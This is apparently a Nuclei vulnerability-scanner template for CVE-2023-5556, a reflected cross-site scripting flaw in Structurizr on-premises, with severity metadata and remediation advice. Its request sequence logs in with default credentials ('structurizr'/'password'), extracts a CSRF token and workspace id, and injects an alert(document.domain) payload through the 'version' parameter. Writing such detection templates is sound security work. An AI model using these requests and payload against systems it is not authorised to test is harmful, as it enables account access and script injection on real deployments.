id: CVE-2023-5556 info: name: Structurizr on-premises - Cross Site Scripting author: shankaracharya severity: medium description: | Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194. remediation: | Apply the latest security patches or updates provided by Structurizr to fix the XSS vulnerability. reference: - https://huntr.com/bounties/a3ee0f98-6898-41ae-b1bd-242a03a73d1b/ - https://github.com/structurizr/onpremises/commit/6cff4f792b010dfb1ff6a0b4ae1c6e398f8f8a18 - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-5556 cwe-id: CWE-79 epss-score: 0.00064 epss-percentile: 0.26455 cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: structurizr product: on-premises_installation shodan-query: http.favicon.hash:1199592666 tags: cve,cve2023,xss,structurizr,oos,authenticated variables: str: "{{randstr}}" http: - raw: - | GET /signin HTTP/1.1 Host: {{Hostname}} - | POST /login HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}}&_csrf={{csrf}}&hash= - | GET /dashboard HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - | GET /workspace/create HTTP/1.1 Host: {{Hostname}} - | GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1 Host: {{Hostname}} attack: pitchfork payloads: username: - "structurizr" password: - "password" matchers-condition: and matchers: - type: word part: body_3 words: - '' - 'Sign out' condition: and - type: word part: body_5 words: - '");alert(document.domain);//' - 'Structurizr' condition: and - type: status status: - 200 extractors: - type: regex name: csrf group: 1 regex: - 'name="_csrf" value="([0-9a-z-]+)"' internal: true - type: regex name: workspace group: 1 part: header regex: - '\/workspace\/([0-9]+)\?scriptNonce=' internal: true # digest: 490a0046304402206ef468fce96e52210ef42ebedc016c173ff1a4381437ae9e2a655261988f671d022077243b6d2ccb046199a4b226cd7d97dff9dd6a24578ac0cca33657a26c70ad63:922c64590222798bb761d5b6d8e72950